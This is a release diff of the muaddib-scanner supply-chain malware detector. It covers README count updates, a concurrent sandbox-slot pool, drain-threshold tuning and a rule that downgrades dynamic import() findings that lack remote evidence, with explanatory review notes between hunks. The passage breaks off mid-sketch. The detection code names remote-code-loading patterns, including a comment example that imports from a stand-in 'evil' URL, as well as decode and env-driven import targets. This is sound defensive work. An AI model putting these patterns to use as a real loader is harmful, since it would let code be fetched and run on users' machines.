muaddib-scanner 2.11.117 → 2.11.119

package/README.md CHANGED
@@ -30,7 +30,7 @@
30
30
 
31
31
  npm and PyPI supply-chain attacks are exploding. Shai-Hulud compromised 25K+ repos in 2025. Existing tools detect threats but don't help you respond.
32
32
 
33
- MUAD'DIB combines **20 parallel scanners** (264 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
33
+ MUAD'DIB combines **20 parallel scanners** (266 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
34
34
 
35
35
  ---
36
36
 
@@ -202,9 +202,9 @@ muaddib replay # Ground truth validation (90/94 TPR@3, v2.11
202
202
  | Python Source (PYSRC) | Import-time / install-time RCE patterns in `__init__.py` / `setup.py` (v2.11.41 — closes TrapDoor PyPI gap) |
203
203
  | Python AST (PYAST) | Tree-sitter-Python AST with taint-aware detectors (v2.11.42+) |
204
204
 
205
- ### 264 detection rules
205
+ ### 266 detection rules
206
206
 
207
- All rules (259 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v21176) for the complete rules reference.
207
+ All rules (261 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v211117) for the complete rules reference.
208
208
 
209
209
  ### Detected campaigns
210
210
 
@@ -278,7 +278,7 @@ With pre-commit framework:
278
278
  ```yaml
279
279
  repos:
280
280
  - repo: https://github.com/DNSZLSK/muad-dib
281
- rev: v2.11.76
281
+ rev: v2.11.117
282
282
  hooks:
283
283
  - id: muaddib-scan
284
284
  ```
@@ -303,7 +303,7 @@ These are the numbers a user gets when running `muaddib scan` against npm or PyP
303
303
  | **FPR PyPI** (v2.11.48, first honest measurement) | **9.68%** (12/124 scanned, 132 total) | **Track D fixed the PyPI downloader** — removed `pip --no-binary :all:` flag (forced compile of wheel-only packages, timed out 38% of the time) + added `.whl` extraction via `extractArchive()`. Brought 42 previously-skipped giants (numpy/pandas/django/matplotlib/scikit-learn/...) into scope. All 12 FPs cluster at score 25-35: this is the cap-PyPI-35 artifact, not new rule misfires. Lifting the cap (Track E) would drop FPR PyPI to ≈0%. 8 residual fails are >500MB packages (torch, tensorflow, scipy, opencv-python, ansible…) hitting the 30s `PACK_TIMEOUT_MS`. |
304
304
  | **ADR** (Adversarial + Holdout, v2.11.48) | **96.26%** (103/107) | 67 adversarial + 40 holdout, global threshold=20. Stable vs v2.10.95. |
305
305
 
306
- **4132 tests** across 115 files. **264 rules** (259 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
306
+ **4414 tests** across 141 files. **266 rules** (261 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
307
307
 
308
308
  **Known issues (v2.11.48):**
309
309
  - *PyPI cap at 35/100*: Python samples are capped at `riskScore=35` even when `globalRiskScore=100`. Confirmed empirically: all 12 PyPI FPs at score 25-35 (flask 32, django 35, tornado 35, bottle 30, pandas 25, matplotlib 25, plotly 25, bokeh 25, pymongo 35, coverage 32, fabric 35, websockets 35). Lifting the cap will simultaneously drop FPR PyPI to ≈0% and unblock PyPI MALWARE detection at higher thresholds. Track E target.
@@ -380,7 +380,7 @@ npm test
380
380
 
381
381
  ### Testing
382
382
 
383
- - **4132 tests** across 115 modular test files
383
+ - **4414 tests** across 141 modular test files
384
384
  - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
385
385
  - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
386
386
  - **Ground truth validation** - 96 real-world attacks (95.74% TPR@3, 88.30% TPR@20 — v2.11.48 full measure on 94 in-scope)
@@ -401,7 +401,7 @@ npm test
401
401
  - [Documentation Index](docs/INDEX.md) - All documentation in one place
402
402
  - [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) - Experimental protocol, holdout scores
403
403
  - [Threat Model](docs/threat-model.md) - What MUAD'DIB detects and doesn't detect
404
- - [Security Policy](SECURITY.md) - Detection rules reference (259 rules)
404
+ - [Security Policy](SECURITY.md) - Detection rules reference (261 rules)
405
405
  - [Security Audit](docs/SECURITY_AUDIT.md) - Bypass validation report
406
406
  - [FP Analysis](docs/EVALUATION.md) - Historical false positive analysis
407
407
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "muaddib-scanner",
3
- "version": "2.11.117",
3
+ "version": "2.11.119",
4
4
  "description": "Supply-chain threat detection & response for npm & PyPI/Python",
5
5
  "main": "src/index.js",
6
6
  "bin": {
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "target": "node_modules",
3
- "timestamp": "2026-06-14T18:18:10.262Z",
3
+ "timestamp": "2026-06-16T08:29:32.212Z",
4
4
  "threats": [
5
5
  {
6
6
  "type": "string_mutation_obfuscation",
@@ -406,7 +406,7 @@ async function resolveHostWithRetry(hostname, opts = {}) {
406
406
  dns.promises.resolve4(hostname).catch(() => []),
407
407
  dns.promises.resolve6(hostname).catch(() => [])
408
408
  ]);
409
- } catch (e) { lastErr = e; }
409
+ } catch { /* DNS threw — ipv4/ipv6 stay [], handled by the no-records path below */ }
410
410
  const all = [...ipv4, ...ipv6];
411
411
  if (all.length > 0) return { ipv4, ipv6, all };
412
412
  lastErr = new Error(`Webhook blocked: no DNS records found for ${hostname}`);
@@ -9,7 +9,7 @@ const { setVerboseMode, isSandboxEnabled, isCanaryEnabled, isLlmDetectiveEnabled
9
9
  const { loadState, saveState, loadDailyStats, saveDailyStats, purgeTarballCache, isDailyReportDue, atomicWriteFileSync, saveNpmSeq, ALERTS_FILE, runStateMigrations, loadRecentlyScanned, saveRecentlyScanned } = require('./state.js');
10
10
  const { isTemporalEnabled, isTemporalAstEnabled, isTemporalPublishEnabled, isTemporalMaintainerEnabled } = require('./temporal.js');
11
11
  const { pendingGrouped, flushScopeGroup, sendDailyReport, redeliverPendingReportOnBoot, alertedPackageRules, ALERTED_PACKAGES_MAX: MAX_ALERTED_PACKAGES } = require('./webhook.js');
12
- const { poll, getPollBackoffMs } = require('./ingestion.js');
12
+ const { poll, getPollBackoffMs, SOFT_BACKPRESSURE_THRESHOLD } = require('./ingestion.js');
13
13
  const { ensureWorkers, drainWorkers, getTargetConcurrency, setTargetConcurrency, getActiveWorkers, terminateAllWorkers, getInFlightItems, computeInterruptDisposition } = require('./queue.js');
14
14
  const { computeTarget, ADJUST_INTERVAL_MS, BASE_CONCURRENCY } = require('./adaptive-concurrency.js');
15
15
  const { startHealthcheck } = require('./healthcheck.js');
@@ -42,9 +42,25 @@ const SHUTDOWN_DRAIN_MAX_MS = (() => {
42
42
  return Number.isFinite(v) && v > 0 ? v : 20_000;
43
43
  })();
44
44
 
45
+ // Drain ceiling (margin): re-ingest from the spill backlog as long as the live
46
+ // queue stays a safe margin BELOW the ingestion backpressure point. The old
47
+ // default (500) was unreachable in steady state — the live queue structurally
48
+ // sits in the thousands (μ scan ≈ λ ingest in active hours), so the backlog
49
+ // drained ~never and grew toward its cap (a one-way street). Tying the ceiling
50
+ // to SOFT_BACKPRESSURE_THRESHOLD makes the drain a self-throttling trickle: it
51
+ // fires during any non-congested window (pressure NONE + headroom) and stops as
52
+ // the queue approaches the point where ingestion would pause anyway, so the
53
+ // backlog never starves fresh ingestion. Env-tunable for live ops.
54
+ const SPILL_DRAIN_MARGIN = (() => {
55
+ const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_MARGIN, 10);
56
+ return Number.isFinite(v) && v > 0 ? v : 5_000;
57
+ })();
45
58
  const SPILL_DRAIN_THRESHOLD = (() => {
46
59
  const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_THRESHOLD, 10);
47
- return Number.isFinite(v) && v > 0 ? v : 500;
60
+ if (Number.isFinite(v) && v > 0) return v;
61
+ // Default: a fixed margin below backpressure (30K - 5K = 25K). Clamp to >= 1
62
+ // in case a future backpressure value is smaller than the margin.
63
+ return Math.max(1, SOFT_BACKPRESSURE_THRESHOLD - SPILL_DRAIN_MARGIN);
48
64
  })();
49
65
  const SPILL_DRAIN_BATCH = (() => {
50
66
  const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_BATCH, 10);
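Review note: the default drain ceiling introduced in this hunk can be read as a small pure function. The sketch below is illustrative only. `parsePositiveInt` and `resolveDrainThreshold` are hypothetical names, and the 30000 backpressure value is an assumption taken from the "30K - 5K = 25K" arithmetic in the comment, not from `ingestion.js` itself.

```javascript
// Hypothetical helper: returns a positive integer, or null when the value is unset/invalid.
function parsePositiveInt(raw) {
  const v = parseInt(raw, 10);
  return Number.isFinite(v) && v > 0 ? v : null;
}

// Hypothetical mirror of the hunk's logic: explicit override first, otherwise
// a fixed margin below the backpressure point, clamped to at least 1.
function resolveDrainThreshold(env, softBackpressure) {
  const explicit = parsePositiveInt(env.MUADDIB_SPILL_DRAIN_THRESHOLD);
  if (explicit !== null) return explicit;
  const margin = parsePositiveInt(env.MUADDIB_SPILL_DRAIN_MARGIN) ?? 5000;
  return Math.max(1, softBackpressure - margin);
}

// Assumed backpressure value of 30000 (from the comment's arithmetic).
const defaults = resolveDrainThreshold({}, 30000);
const overridden = resolveDrainThreshold({ MUADDIB_SPILL_DRAIN_THRESHOLD: '800' }, 30000);
// A backpressure value smaller than the margin exercises the clamp.
const clamped = resolveDrainThreshold({ MUADDIB_SPILL_DRAIN_MARGIN: '5000' }, 1000);
console.log(defaults, overridden, clamped);
```

Keeping the explicit threshold override ahead of the margin means an operator who already sets `MUADDIB_SPILL_DRAIN_THRESHOLD` sees no behavior change from this release.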
@@ -6,11 +6,12 @@
6
6
  * Items are sorted by riskScore DESC (highest-risk first) to defend
7
7
  * against queue-poisoning attacks.
8
8
  *
9
- * The worker owns a dedicated sandbox slot (_deferredSlotBusy) that is
10
- * completely independent from the shared semaphore used by T1a/T1b/T2.
11
- * This guarantees the deferred worker can always process, regardless of
12
- * how many main-path sandboxes are running. The VPS supports N+1
13
- * concurrent gVisor containers (3 main + 1 deferred).
9
+ * The worker owns a dedicated POOL of sandbox slots (DEFERRED_SANDBOX_SLOTS,
10
+ * _deferredSlotsActive) that is completely independent from the shared semaphore
11
+ * used by the synchronous path. This guarantees the deferred worker can always
12
+ * process, regardless of how many main-path sandboxes are running, and runs
13
+ * several items concurrently so the queue actually drains (a single slot
14
+ * serialized all T1a deep sandboxes and the queue stayed permanently full).
14
15
  */
15
16
  const fs = require('fs');
16
17
  const path = require('path');
@@ -32,10 +33,23 @@ const DEFERRED_STATE_FILE = path.join(__dirname, '..', '..', 'data', 'deferred-q
32
33
  // slot. HIGH=10 pts is the intended T1b floor — values below 5 are LOW-only
33
34
  // aggregates which carry no actionable sandbox signal.
34
35
  const DEFERRED_MIN_SCORE = 5;
35
- // Hard ceiling on a single deferred sandbox run so the dedicated slot
36
- // (_deferredSlotBusy) can never wedge. maxRuns=1 self-bounds at ~SINGLE_RUN_TIMEOUT
37
- // (90s) + the sandbox watchdog grace; this AbortController is belt-and-suspenders.
36
+ // Hard ceiling on a single deferred sandbox run so a deferred slot can never
37
+ // wedge. maxRuns=1 self-bounds at ~SINGLE_RUN_TIMEOUT (90s) + the sandbox
38
+ // watchdog grace; this AbortController is belt-and-suspenders.
38
39
  const DEFERRED_SANDBOX_TIMEOUT_MS = 150_000;
40
+ // Number of CONCURRENT deferred sandbox runs. The old design used a single
41
+ // boolean slot (1 at a time), which serialized ALL deferred T1a deep sandboxes
42
+ // — measured at ~1 run / several minutes, so the queue (cap DEFERRED_QUEUE_MAX)
43
+ // sat permanently full with items aging out at TTL. Phase 3 routed T1a's sandbox
44
+ // here AND bypasses the shared semaphore, so the main pool (MUADDIB_SANDBOX_CONCURRENCY)
45
+ // was sitting idle while everything queued behind one deferred slot. This pool
46
+ // uses that idle capacity. Default 3 (conservative under the typical 4-slot main
47
+ // pool); each gVisor container is ~512 MB, so 3 ≈ 1.5 GB — keep an eye on host
48
+ // RSS if raised. Env-tunable for live ops.
49
+ const DEFERRED_SANDBOX_SLOTS = (() => {
50
+ const v = parseInt(process.env.MUADDIB_DEFERRED_SANDBOX_SLOTS, 10);
51
+ return Number.isFinite(v) && v >= 1 ? v : 3;
52
+ })();
39
53
 
40
54
  // Tier priority for the deferred queue. Phase 3 routes T1a's sandbox here (async)
41
55
  // instead of block-waiting a scan worker, so T1a is the highest-confidence tier and
@@ -61,7 +75,10 @@ const _deferredQueue = [];
61
75
  const _deferredSeen = new Set(); // name@version dedup
62
76
  let _workerHandle = null;
63
77
  let _stats = null; // reference to shared stats object
64
- let _deferredSlotBusy = false; // Dedicated slot: true while deferred sandbox is running
78
+ let _deferredSlotsActive = 0; // Concurrent deferred sandbox runs in flight (0..DEFERRED_SANDBOX_SLOTS)
79
+ // Indirection so tests can inject a controllable async sandbox without Docker
80
+ // (the concurrency contract is verified behaviorally, not by source-grep).
81
+ let _runSandboxFn = runSandbox;
65
82
 
66
83
  // ── Queue management ──
67
84
 
@@ -204,8 +221,11 @@ async function processDeferredItem(stats) {
204
221
 
205
222
  if (_deferredQueue.length === 0) return null;
206
223
 
207
- // 2. Dedicated slot check — completely independent from main semaphore
208
- if (_deferredSlotBusy) {
224
+ // 2. Pool slot check — completely independent from main semaphore. The
225
+ // synchronous prefix below (shift + increment) runs before the first await,
226
+ // so processDeferredBatch can launch several of these in a tight loop without
227
+ // over-subscribing: each increment is visible to the next iteration.
228
+ if (_deferredSlotsActive >= DEFERRED_SANDBOX_SLOTS) {
209
229
  if (stats) stats.deferredSkipped = (stats.deferredSkipped || 0) + 1;
210
230
  return null;
211
231
  }
@@ -215,10 +235,10 @@ async function processDeferredItem(stats) {
215
235
  const key = `${item.name}@${item.version}`;
216
236
  _deferredSeen.delete(key);
217
237
 
218
- console.log(`[DEFERRED] PROCESSING: ${key} (tier=${_tierLabel(item.tier)}, score=${item.riskScore}, retries=${item.retries})`);
238
+ console.log(`[DEFERRED] PROCESSING: ${key} (tier=${_tierLabel(item.tier)}, score=${item.riskScore}, retries=${item.retries}, slots=${_deferredSlotsActive + 1}/${DEFERRED_SANDBOX_SLOTS})`);
219
239
 
220
- // 4. Run sandbox on dedicated slot (bypasses shared semaphore)
221
- _deferredSlotBusy = true;
240
+ // 4. Run sandbox on a pool slot (bypasses shared semaphore)
241
+ _deferredSlotsActive++;
222
242
  let sandboxResult;
223
243
  const ac = new AbortController();
224
244
  const deadline = setTimeout(() => ac.abort(), DEFERRED_SANDBOX_TIMEOUT_MS);
@@ -230,7 +250,7 @@ async function processDeferredItem(stats) {
230
250
  // single-run (maxRuns=1, ~90s vs ~270s) for fast deferred-queue drain.
231
251
  const maxRuns = item.tier === '1a' ? undefined : 1;
232
252
  markSandboxed(item.name); // stamp for sandbox-revalidation cadence (matches the synchronous path)
233
- sandboxResult = await runSandbox(item.name, { canary, skipSemaphore: true, maxRuns, signal: ac.signal });
253
+ sandboxResult = await _runSandboxFn(item.name, { canary, skipSemaphore: true, maxRuns, signal: ac.signal });
234
254
  console.log(`[DEFERRED] SANDBOX COMPLETE: ${key} -> score=${sandboxResult.score}, severity=${sandboxResult.severity}`);
235
255
  } catch (err) {
236
256
  console.error(`[DEFERRED] SANDBOX ERROR: ${key} — ${err.message}`);
@@ -247,7 +267,7 @@ async function processDeferredItem(stats) {
247
267
  return null;
248
268
  } finally {
249
269
  clearTimeout(deadline);
250
- _deferredSlotBusy = false;
270
+ _deferredSlotsActive--;
251
271
  }
252
272
 
253
273
  // 5. Follow-up webhook if sandbox found something
@@ -302,6 +322,31 @@ async function processDeferredItem(stats) {
302
322
  return sandboxResult;
303
323
  }
304
324
 
325
+ /**
326
+ * Tick dispatcher: launch deferred items CONCURRENTLY up to the free pool slots.
327
+ * processDeferredItem runs its slot-acquire (shift + increment) synchronously
328
+ * before its first await, so each launch is visible to the next loop iteration —
329
+ * no over-subscription past DEFERRED_SANDBOX_SLOTS. Calls are fire-and-forget:
330
+ * processDeferredItem is fully self-contained (its try/catch/finally swallows
331
+ * sandbox errors and always releases the slot), so a launched run never rejects
332
+ * the dispatcher. Returns the number launched this tick (for tests/observability).
333
+ * @returns {number}
334
+ */
335
+ function processDeferredBatch(stats) {
336
+ let launched = 0;
337
+ // Bound the loop by the free slot count so a transient queue can't spin it.
338
+ while (_deferredSlotsActive < DEFERRED_SANDBOX_SLOTS && _deferredQueue.length > 0) {
339
+ const before = _deferredSlotsActive;
340
+ const p = processDeferredItem(stats);
341
+ // If the slot wasn't acquired (e.g. queue emptied by pruning inside the call),
342
+ // stop — otherwise the guard above could loop without progress.
343
+ if (_deferredSlotsActive === before) break;
344
+ launched++;
345
+ if (p && typeof p.catch === 'function') p.catch(() => { /* self-handled */ });
346
+ }
347
+ return launched;
348
+ }
349
+
305
350
  /**
306
351
  * Build Discord embed for deferred sandbox follow-up.
307
352
  */
@@ -348,10 +393,14 @@ function buildDeferredFollowUpEmbed(name, version, ecosystem, sandboxResult, sta
348
393
  function startDeferredWorker(stats) {
349
394
  _stats = stats;
350
395
  if (_workerHandle) return _workerHandle;
351
- console.log(`[DEFERRED] Worker started (interval=${DEFERRED_WORKER_INTERVAL_MS / 1000}s, max=${DEFERRED_QUEUE_MAX}, ttl=${DEFERRED_TTL_MS / 3600000}h)`);
352
- _workerHandle = setInterval(async () => {
396
+ console.log(`[DEFERRED] Worker started (interval=${DEFERRED_WORKER_INTERVAL_MS / 1000}s, max=${DEFERRED_QUEUE_MAX}, slots=${DEFERRED_SANDBOX_SLOTS}, ttl=${DEFERRED_TTL_MS / 3600000}h)`);
397
+ _workerHandle = setInterval(() => {
353
398
  try {
354
- await processDeferredItem(_stats);
399
+ // Fill free pool slots each tick. The dispatcher launches concurrent runs
400
+ // (fire-and-forget); long-running sandboxes keep their slots across ticks,
401
+ // so steady state is DEFERRED_SANDBOX_SLOTS in flight while the queue drains.
402
+ pruneExpired(_stats);
403
+ processDeferredBatch(_stats);
355
404
  } catch (err) {
356
405
  console.error(`[DEFERRED] Worker tick error: ${err.message}`);
357
406
  }
@@ -465,12 +514,25 @@ function _resetDeferredQueue() {
465
514
  _deferredQueue.length = 0;
466
515
  _deferredSeen.clear();
467
516
  _stats = null;
468
- _deferredSlotBusy = false;
517
+ _deferredSlotsActive = 0;
518
+ _runSandboxFn = runSandbox;
469
519
  stopDeferredWorker();
470
520
  }
471
521
 
522
+ // Test seam: inject a controllable sandbox runner (restored by _resetDeferredQueue).
523
+ function _setRunSandboxForTest(fn) {
524
+ _runSandboxFn = fn || runSandbox;
525
+ }
526
+
527
+ // True while at least one deferred sandbox is in flight. Kept for back-compat
528
+ // (callers/tests that only care "is the deferred path active"); use
529
+ // getDeferredSlotsActive() for the concurrent count.
472
530
  function isDeferredSlotBusy() {
473
- return _deferredSlotBusy;
531
+ return _deferredSlotsActive > 0;
532
+ }
533
+
534
+ function getDeferredSlotsActive() {
535
+ return _deferredSlotsActive;
474
536
  }
475
537
 
476
538
  /**
@@ -492,14 +554,18 @@ module.exports = {
492
554
  startDeferredWorker,
493
555
  stopDeferredWorker,
494
556
  processDeferredItem,
557
+ processDeferredBatch,
495
558
  persistDeferredQueue,
496
559
  restoreDeferredQueue,
497
560
  buildDeferredFollowUpEmbed,
498
561
  pruneExpired,
499
562
  isDeferredSlotBusy,
563
+ getDeferredSlotsActive,
500
564
  clearDeferredQueue,
501
565
  _resetDeferredQueue,
566
+ _setRunSandboxForTest,
502
567
  DEFERRED_QUEUE_MAX,
568
+ DEFERRED_SANDBOX_SLOTS,
503
569
  DEFERRED_TTL_MS,
504
570
  DEFERRED_MAX_RETRIES,
505
571
  DEFERRED_WORKER_INTERVAL_MS,
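Review note: the no-over-subscription argument in the `processDeferredBatch` comment rests on the slot being acquired before the first `await`. The following is a minimal stand-alone sketch of that pattern, not the package's code: `SLOTS`, `active`, `runItem`, `dispatch`, and the `sleep` stand-in for the sandbox are all hypothetical names.

```javascript
// Illustrative pool; every name here is hypothetical.
const SLOTS = 3;
let active = 0;
let peak = 0;
const queue = ['a', 'b', 'c', 'd', 'e'];
const done = [];

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

async function runItem() {
  // Synchronous prefix: everything before the first await runs inside the
  // caller's loop iteration, so the increment is visible to the next iteration.
  if (active >= SLOTS || queue.length === 0) return null;
  const item = queue.shift();
  active++;
  peak = Math.max(peak, active);
  try {
    await sleep(10); // stand-in for the sandbox run
    done.push(item);
    return item;
  } finally {
    active--; // the slot is always released
  }
}

function dispatch() {
  let launched = 0;
  while (active < SLOTS && queue.length > 0) {
    const before = active;
    const p = runItem();
    if (active === before) break; // no slot acquired: stop instead of spinning
    launched++;
    p.catch(() => {}); // fire-and-forget
  }
  return launched;
}

const firstTick = dispatch();  // fills every free slot
const secondTick = dispatch(); // pool is full, so nothing is launched
console.log(firstTick, secondTick, peak);
```

If the acquire happened after an `await`, every call in the loop would see the same stale counter and the pool could exceed its limit.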
@@ -1528,6 +1528,7 @@ module.exports = {
1528
1528
  POLL_INTERVAL,
1529
1529
  POLL_MAX_BACKOFF,
1530
1530
  MAX_RESPONSE_BYTES,
1531
+ SOFT_BACKPRESSURE_THRESHOLD,
1531
1532
 
1532
1533
  // Mutable state
1533
1534
  getConsecutivePollErrors,
@@ -182,7 +182,13 @@ function _compactBacklog(file, ledgerFn = null) {
182
182
 
183
183
  /**
184
184
  * Pure drain predicate (exported for tests + the daemon main loop): drain only
185
- * when memory pressure is fully cleared AND the live queue has headroom.
185
+ * when memory pressure is fully cleared AND the live queue is below the drain
186
+ * ceiling. `threshold` is a MARGIN ceiling (a margin below the ingestion
187
+ * backpressure point — see daemon.js SPILL_DRAIN_THRESHOLD), NOT a "queue nearly
188
+ * empty" low-water mark: the latter (the old 500/5000) was unreachable in steady
189
+ * state, so the backlog never drained. With the margin ceiling the drain is a
190
+ * self-throttling trickle — it auto-stops the moment pressure rises (≥ ELEVATED)
191
+ * or the queue climbs toward backpressure, so it never starves fresh ingestion.
186
192
  */
187
193
  function shouldDrain(pressureLevel, queueLen, threshold) {
188
194
  return pressureLevel === 0 && queueLen < threshold;
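Review note: a few sample inputs show why the old low-water default never fired while the new ceiling does. The predicate is copied from the hunk above. The pressure constants, the 25000 ceiling, and the queue lengths are illustrative assumptions, not measurements from the package.

```javascript
// Same predicate as in the hunk above.
function shouldDrain(pressureLevel, queueLen, threshold) {
  return pressureLevel === 0 && queueLen < threshold;
}

const NONE = 0;        // assumed: 0 means no memory pressure
const ELEVATED = 1;    // assumed: any non-zero level blocks the drain
const CEILING = 25000; // assumed default (backpressure minus margin)

const samples = [
  { pressure: NONE, queueLen: 3200 },     // typical live queue, below the ceiling
  { pressure: NONE, queueLen: 25000 },    // at the ceiling: drain stops
  { pressure: ELEVATED, queueLen: 3200 }, // pressure raised: drain stops
];
const decisions = samples.map((s) => shouldDrain(s.pressure, s.queueLen, CEILING));

// With the old default of 500, the same typical queue never qualifies.
const oldDefault = shouldDrain(NONE, 3200, 500);
console.log(decisions, oldDefault);
```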
@@ -3,6 +3,55 @@
3
3
  const {
4
4
  SOLANA_PACKAGES
5
5
  } = require('./constants.js');
6
+ const { containsDecodePattern } = require('./helpers.js');
7
+
8
+ // Gate #2 (FPR 2026-06-15, Step 0 adjudication): a computed dynamic import() is only
9
+ // remote-code-loading when there is positive evidence of a remote/decoded/env-driven target
10
+ // (URL literal, .replace() URL manipulation, atob/Buffer decode, or a process.env-sourced
11
+ // specifier). Bounded-local imports — CLI subcommand dispatchers (import(MAP[cmd])), layout/i18n
12
+ // loaders (import(`../x/${name}.js`)), dep-resolve / own-dist shims (import(join(dir,'dist/main.js')))
13
+ // — were ~19% of the band-20-49 false positives with 0 TP. Without evidence, computed imports
14
+ // stay HIGH (still fires, but ~25→10 pts: sub-threshold alone) instead of CRITICAL. Flag-gated;
15
+ // when the flag is off the legacy CRITICAL-on-Identifier/TemplateLiteral behavior is preserved.
16
+ function _importStaticText(node) {
17
+ if (!node) return '';
18
+ if (node.type === 'Literal') return typeof node.value === 'string' ? node.value : '';
19
+ if (node.type === 'TemplateLiteral') {
20
+ return (node.quasis || [])
21
+ .map(q => (q.value && (q.value.cooked != null ? q.value.cooked : q.value.raw)) || '')
22
+ .join(' ');
23
+ }
24
+ if (node.type === 'BinaryExpression' && node.operator === '+') {
25
+ return _importStaticText(node.left) + ' ' + _importStaticText(node.right);
26
+ }
27
+ return '';
28
+ }
29
+
30
+ function _isProcessEnvMember(node) {
31
+ return !!node && node.type === 'MemberExpression' &&
32
+ node.object && node.object.type === 'MemberExpression' &&
33
+ node.object.object && node.object.object.type === 'Identifier' && node.object.object.name === 'process' &&
34
+ node.object.property && node.object.property.type === 'Identifier' && node.object.property.name === 'env';
35
+ }
36
+
37
+ function _importRemoteEvidence(src, ctx) {
38
+ // URL manipulation (GlassWorm): import(x.replace(...))
39
+ if (src.type === 'CallExpression' && src.callee && src.callee.type === 'MemberExpression' &&
40
+ src.callee.property && src.callee.property.name === 'replace') return true;
41
+ // env-driven specifier: import(process.env.X), or import(v) where v was assigned from process.env.X
42
+ if (_isProcessEnvMember(src)) return true;
43
+ if (src.type === 'Identifier' && ctx.varSource && ctx.varSource.get(src.name) === 'env_var') return true;
44
+ // identifier resolving to a URL string literal: const u = 'https://evil/x.js'; import(u)
45
+ if (src.type === 'Identifier' && ctx.stringVarValues) {
46
+ const resolved = ctx.stringVarValues.get(src.name);
47
+ if (resolved && /https?:|:\/\//i.test(resolved)) return true;
48
+ }
49
+ // runtime decode: import(atob(...)) / import(Buffer.from(...).toString())
50
+ if (containsDecodePattern(src)) return true;
51
+ // explicit URL scheme in the static parts of the specifier
52
+ if (/https?:|:\/\//i.test(_importStaticText(src))) return true;
53
+ return false;
54
+ }
6
55
 
7
56
  function handleImportExpression(node, ctx) {
8
57
  if (node.source) {
@@ -25,11 +74,29 @@ function handleImportExpression(node, ctx) {
25
74
  if (SOLANA_PACKAGES.some(pkg => src.value === pkg)) {
26
75
  ctx.hasSolanaImport = true;
27
76
  }
77
+ } else if (process.env.MUADDIB_DYNIMPORT_BOUNDED === '1') {
78
+ // Gate #2 (downgrade-only — never escalates above legacy severity, so it cannot raise FPR):
79
+ // a legacy-CRITICAL computed import (Identifier / TemplateLiteral / .replace URL) drops to HIGH
80
+ // when there is NO remote/decode/env evidence (bounded/local: CLI dispatchers, layout/i18n
81
+ // loaders, dep-resolve shims). With evidence it stays CRITICAL; a legacy-HIGH argument stays HIGH.
82
+ const legacyCritical = src.type === 'Identifier' || src.type === 'TemplateLiteral' ||
83
+ (src.type === 'CallExpression' && src.callee?.property?.name === 'replace');
84
+ const bounded = legacyCritical && !_importRemoteEvidence(src, ctx);
85
+ ctx.threats.push({
86
+ type: 'dynamic_import',
87
+ severity: bounded ? 'HIGH' : (legacyCritical ? 'CRITICAL' : 'HIGH'),
88
+ message: bounded
89
+ ? 'Dynamic import() with computed (bounded/local) argument — possible obfuscation.'
90
+ : (legacyCritical
91
+ ? 'Dynamic import() with computed URL argument — remote code loading from dynamically constructed URL.'
92
+ : 'Dynamic import() with computed argument (possible obfuscation).'),
93
+ file: ctx.relFile
94
+ });
28
95
  } else {
29
- // Blue Team v8b (C6): Dynamic import with non-literal arg if it's a variable
30
- // built from URL manipulation, this is remote code loading
31
- const isCritical = node.source.type === 'Identifier' || node.source.type === 'TemplateLiteral' ||
32
- (node.source.type === 'CallExpression' && node.source.callee?.property?.name === 'replace');
96
+ // Legacy behavior (gate off): Blue Team v8b (C6) non-literal arg is CRITICAL when it
97
+ // looks like a constructed URL (Identifier / TemplateLiteral / .replace()).
98
+ const isCritical = src.type === 'Identifier' || src.type === 'TemplateLiteral' ||
99
+ (src.type === 'CallExpression' && src.callee?.property?.name === 'replace');
33
100
  ctx.threats.push({
34
101
  type: 'dynamic_import',
35
102
  severity: isCritical ? 'CRITICAL' : 'HIGH',
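Review note: the downgrade-only rule reduces to "CRITICAL only when the argument is legacy-critical and carries remote evidence". The sketch below is a simplified reading of that rule. It models only two of the evidence kinds (a URL scheme in the static text, and a `.replace()` call) and omits the env-var, resolved-identifier, and decode checks. `classifyDynamicImport` and the sample nodes are hypothetical.

```javascript
// Simplified sketch: only URL-scheme and .replace() evidence are modelled.
const URL_RE = /https?:|:\/\//i;

// Collect the static string parts of an ESTree-style node.
function staticText(node) {
  if (!node) return '';
  if (node.type === 'Literal') return typeof node.value === 'string' ? node.value : '';
  if (node.type === 'TemplateLiteral') {
    return (node.quasis || []).map((q) => (q.value && q.value.cooked) || '').join(' ');
  }
  if (node.type === 'BinaryExpression' && node.operator === '+') {
    return staticText(node.left) + ' ' + staticText(node.right);
  }
  return '';
}

// Hypothetical classifier: never escalates above the legacy severity.
function classifyDynamicImport(src) {
  const isReplaceCall = src.type === 'CallExpression' &&
    src.callee?.property?.name === 'replace';
  const legacyCritical = src.type === 'Identifier' ||
    src.type === 'TemplateLiteral' || isReplaceCall;
  const hasEvidence = isReplaceCall || URL_RE.test(staticText(src));
  return legacyCritical && hasEvidence ? 'CRITICAL' : 'HIGH';
}

// import(`../locales/${name}.js`): bounded local loader
const localTemplate = { type: 'TemplateLiteral',
  quasis: [{ value: { cooked: '../locales/' } }, { value: { cooked: '.js' } }] };
// import(`https://cdn.example/${name}.mjs`): URL scheme in the static parts
const remoteTemplate = { type: 'TemplateLiteral',
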